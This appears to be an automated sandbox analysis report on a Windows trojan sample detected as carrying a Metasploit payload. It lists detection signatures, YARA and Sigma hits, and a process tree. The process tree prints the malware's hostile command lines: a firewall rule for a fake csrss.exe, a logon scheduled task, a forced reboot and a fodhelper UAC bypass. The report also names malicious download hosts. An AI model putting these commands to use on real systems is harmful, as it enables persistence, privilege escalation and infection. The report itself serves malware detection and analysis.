Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 4t4y4r89UZ

Overview

General Information

Sample Name:4t4y4r89UZ (renamed file extension from none to exe)
Analysis ID:519673
MD5:14c0d8425930ccec0566b04864a05670
SHA1:07fd6746417c89239e8b4b272fa350c5dc41c580
SHA256:fea538eff5bc9cd3970edda4b3ddfa0e72505b01dc207e47d8112074720fa05e
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

Metasploit
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Metasploit Payload
Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Sigma detected: Schedule system process
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Creates an autostart registry key pointing to binary in C:\Windows
Sigma detected: System File Execution Location Anomaly
Uses netsh to modify the Windows network and firewall settings
Found Tor onion address
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses shutdown.exe to shutdown or reboot the system
Changes security center settings (notifications, updates, antivirus, firewall)
Machine Learning detection for sample
Creates files in the system32 config directory
May modify the system service descriptor table (often done to hook functions)
Machine Learning detection for dropped file
Modifies the windows firewall
Performs DNS TXT record lookups
Drops executables to the windows directory (C:\Windows) and starts them
Sigma detected: Bypass UAC via Fodhelper.exe
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files with benign system names
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Creates files inside the system directory
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Enables debug privileges
Is looking for software installed on the system
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Contains capabilities to detect virtual machines
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sigma detected: Netsh Port or Application Allowed
Sigma detected: Conhost Parent Process Executions
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • 4t4y4r89UZ.exe (PID: 5272 cmdline: "C:\Users\user\Desktop\4t4y4r89UZ.exe" MD5: 14C0D8425930CCEC0566B04864A05670)
    • 4t4y4r89UZ.exe (PID: 5300 cmdline: C:\Users\user\Desktop\4t4y4r89UZ.exe MD5: 14C0D8425930CCEC0566B04864A05670)
      • cmd.exe (PID: 2012 cmdline: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 7108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • csrss.exe (PID: 916 cmdline: C:\Windows\rss\csrss.exe MD5: 14C0D8425930CCEC0566B04864A05670)
        • netsh.exe (PID: 7080 cmdline: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes MD5: 98CC37BBF363A38834253E22C80A8F32)
      • csrss.exe (PID: 3192 cmdline: C:\Windows\rss\csrss.exe /305-305 MD5: 14C0D8425930CCEC0566B04864A05670)
        • schtasks.exe (PID: 4036 cmdline: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
          • conhost.exe (PID: 4004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 7076 cmdline: schtasks /delete /tn ScheduledUpdate /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
          • conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • mountvol.exe (PID: 5656 cmdline: mountvol B: /s MD5: 5C11B99E6D41403031CD946255E8A353)
          • conhost.exe (PID: 3012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • mountvol.exe (PID: 2224 cmdline: mountvol B: /d MD5: 5C11B99E6D41403031CD946255E8A353)
          • conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • mountvol.exe (PID: 5784 cmdline: mountvol B: /s MD5: 5C11B99E6D41403031CD946255E8A353)
          • conhost.exe (PID: 1956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • mountvol.exe (PID: 7104 cmdline: mountvol B: /d MD5: 5C11B99E6D41403031CD946255E8A353)
          • conhost.exe (PID: 5108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • shutdown.exe (PID: 5384 cmdline: shutdown -r -t 5 MD5: E2EB9CC0FE26E28406FB6F82F8E81B26)
          • conhost.exe (PID: 6932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6436 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4072 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6272 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3076 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6336 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6896 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6784 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6848 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • TrustedInstaller.exe (PID: 6756 cmdline: C:\Windows\servicing\TrustedInstaller.exe MD5: 4578046C54A954C917BB393B70BA0AEB)
  • csrss.exe (PID: 1240 cmdline: "C:\Windows\rss\csrss.exe" MD5: 14C0D8425930CCEC0566B04864A05670)
    • cmd.exe (PID: 7140 cmdline: C:\Windows\Sysnative\cmd.exe /C fodhelper MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 5580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • fodhelper.exe (PID: 6256 cmdline: fodhelper MD5: 1D1F9E564472A9698F1BE3F9FEB9864B)
      • fodhelper.exe (PID: 5776 cmdline: "C:\Windows\system32\fodhelper.exe" MD5: 1D1F9E564472A9698F1BE3F9FEB9864B)
      • fodhelper.exe (PID: 6016 cmdline: "C:\Windows\system32\fodhelper.exe" MD5: 1D1F9E564472A9698F1BE3F9FEB9864B)
        • csrss.exe (PID: 5360 cmdline: "C:\Windows\rss\csrss.exe" MD5: 14C0D8425930CCEC0566B04864A05670)
  • svchost.exe (PID: 6580 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • csrss.exe (PID: 7108 cmdline: C:\Windows\rss\csrss.exe MD5: 14C0D8425930CCEC0566B04864A05670)
  • csrss.exe (PID: 3016 cmdline: "C:\Windows\rss\csrss.exe" MD5: 14C0D8425930CCEC0566B04864A05670)
    • cmd.exe (PID: 4400 cmdline: C:\Windows\Sysnative\cmd.exe /C fodhelper MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 3212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • fodhelper.exe (PID: 2528 cmdline: fodhelper MD5: 1D1F9E564472A9698F1BE3F9FEB9864B)
      • fodhelper.exe (PID: 3932 cmdline: "C:\Windows\system32\fodhelper.exe" MD5: 1D1F9E564472A9698F1BE3F9FEB9864B)
  • svchost.exe (PID: 6488 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
    0000002A.00000002.376433226.0000000000400000.00000040.00020000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
      00000032.00000003.393407437.000000000638A000.00000004.00000001.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
        0000000E.00000003.327032138.000000000638A000.00000004.00000001.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
          00000022.00000003.354921763.000000000638A000.00000004.00000001.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
            Click to see the 19 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.4t4y4r89UZ.exe.9a56e0.2.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth
            • 0x444b8:$s2: The Magic Word!
            • 0x505f8:$s2: The Magic Word!
            • 0x44818:$s3: Software\Oracle\VirtualBox
            • 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
            23.2.csrss.exe.9ab080.0.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth
            • 0x3eb18:$s2: The Magic Word!
            • 0x4ac58:$s2: The Magic Word!
            • 0x3ee78:$s3: Software\Oracle\VirtualBox
            • 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
            23.3.csrss.exe.65540e0.3.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth
            • 0x444b8:$s2: The Magic Word!
            • 0x505f8:$s2: The Magic Word!
            • 0x44818:$s3: Software\Oracle\VirtualBox
            • 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
            14.3.csrss.exe.655bce0.3.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth
            • 0x3c8b8:$s2: The Magic Word!
            • 0x489f8:$s2: The Magic Word!
            • 0x3cc18:$s3: Software\Oracle\VirtualBox
            • 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
            10.2.4t4y4r89UZ.exe.9ad2e0.0.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth
            • 0x3c8b8:$s2: The Magic Word!
            • 0x489f8:$s2: The Magic Word!
            • 0x3cc18:$s3: Software\Oracle\VirtualBox
            • 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
            Click to see the 99 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: System File Execution Location AnomalyShow sources
            Source: Process startedAuthor: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community: Data: Command: C:\Windows\rss\csrss.exe /305-305, CommandLine: C:\Windows\rss\csrss.exe /305-305, CommandLine|base64offset|contains: }9}9, Image: C:\Windows\rss\csrss.exe, NewProcessName: C:\Windows\rss\csrss.exe, OriginalFileName: C:\Windows\rss\csrss.exe, ParentCommandLine: C:\Users\user\Desktop\4t4y4r89UZ.exe, ParentImage: C:\Users\user\Desktop\4t4y4r89UZ.exe, ParentProcessId: 5300, ProcessCommandLine: C:\Windows\rss\csrss.exe /305-305, ProcessId: 3192
            Sigma detected: Bypass UAC via Fodhelper.exeShow sources
            Source: Process startedAuthor: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community: Data: Command: "C:\Windows\rss\csrss.exe" , CommandLine: "C:\Windows\rss\csrss.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\rss\csrss.exe, NewProcessName: C:\Windows\rss\csrss.exe, OriginalFileName: C:\Windows\rss\csrss.exe, ParentCommandLine: "C:\Windows\system32\fodhelper.exe" , ParentImage: C:\Windows\System32\fodhelper.exe, ParentProcessId: 6016, ProcessCommandLine: "C:\Windows\rss\csrss.exe" , ProcessId: 5360
            Sigma detected: Netsh Port or Application AllowedShow sources
            Source: Process startedAuthor: Markus Neis, Sander Wiebing: Data: Command: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes, CommandLine: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2012, ProcessCommandLine: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes, ProcessId: 7080
            Sigma detected: Conhost Parent Process ExecutionsShow sources
            Source: Process startedAuthor: omkar72: Data: Command: C:\Windows\rss\csrss.exe, CommandLine: C:\Windows\rss\csrss.exe, CommandLine|base64offset|contains: , Image: C:\Windows\rss\csrss.exe, NewProcessName: C:\Windows\rss\csrss.exe, OriginalFileName: C:\Windows\rss\csrss.exe, ParentCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 7108, ProcessCommandLine: C:\Windows\rss\csrss.exe, ProcessId: 916
            Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\rss\csrss.exe /305-305, CommandLine: C:\Windows\rss\csrss.exe /305-305, CommandLine|base64offset|contains: }9}9, Image: C:\Windows\rss\csrss.exe, NewProcessName: C:\Windows\rss\csrss.exe, OriginalFileName: C:\Windows\rss\csrss.exe, ParentCommandLine: C:\Users\user\Desktop\4t4y4r89UZ.exe, ParentImage: C:\Users\user\Desktop\4t4y4r89UZ.exe, ParentProcessId: 5300, ProcessCommandLine: C:\Windows\rss\csrss.exe /305-305, ProcessId: 3192

            Persistence and Installation Behavior:

            barindex
            Sigma detected: Schedule system processShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F, CommandLine: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\rss\csrss.exe /305-305, ParentImage: C:\Windows\rss\csrss.exe, ParentProcessId: 3192, ProcessCommandLine: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F, ProcessId: 4036

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for submitted fileShow sources
            Source: 4t4y4r89UZ.exeVirustotal: Detection: 33%Perma Link
            Antivirus detection for URL or domainShow sources
            Source: https://runmodes.com/api/logAvira URL Cloud: Label: malware
            Source: http://newscommer.com/app/app.exeURL Reputation: Label: malware
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeAvira: detection malicious, Label: TR/Agent.twerk
            Source: C:\Windows\windefender.exeAvira: detection malicious, Label: TR/Crypt.XPACK.eocey
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllAvira: detection malicious, Label: TR/Redcap.gsjan
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllMetadefender: Detection: 45%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllReversingLabs: Detection: 59%
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeMetadefender: Detection: 13%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeReversingLabs: Detection: 73%
            Source: C:\Windows\rss\csrss.exeReversingLabs: Detection: 38%
            Source: C:\Windows\windefender.exeMetadefender: Detection: 28%Perma Link
            Source: C:\Windows\windefender.exeReversingLabs: Detection: 78%
            Machine Learning detection for sampleShow sources
            Source: 4t4y4r89UZ.exeJoe Sandbox ML: detected
            Machine Learning detection for dropped fileShow sources
            Source: C:\Windows\rss\csrss.exeJoe Sandbox ML: detected
            Source: 14.3.csrss.exe.1694ea00.16.unpackAvira: Label: TR/Patched.Ren.Gen
            Source: 14.2.csrss.exe.16c44000.16.unpackAvira: Label: TR/Patched.Ren.Gen

            Compliance:

            barindex
            Detected unpacking (overwrites its own PE header)Show sources
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeUnpacked PE file: 0.2.4t4y4r89UZ.exe.400000.3.unpack
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeUnpacked PE file: 10.2.4t4y4r89UZ.exe.400000.2.unpack
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 14.2.csrss.exe.400000.0.unpack
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 23.2.csrss.exe.400000.2.unpack
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 34.2.csrss.exe.400000.3.unpack
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 42.2.csrss.exe.400000.1.unpack
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 50.2.csrss.exe.400000.0.unpack
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 50.2.csrss.exe.400000.0.unpack
            Source: 4t4y4r89UZ.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: Binary string: Loader.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: EfiGuardDxe.pdb7 source: csrss.exe, csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmp
            Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: symsrv.pdb source: csrss.exe
            Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: C:\Users\mac\Desktop\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
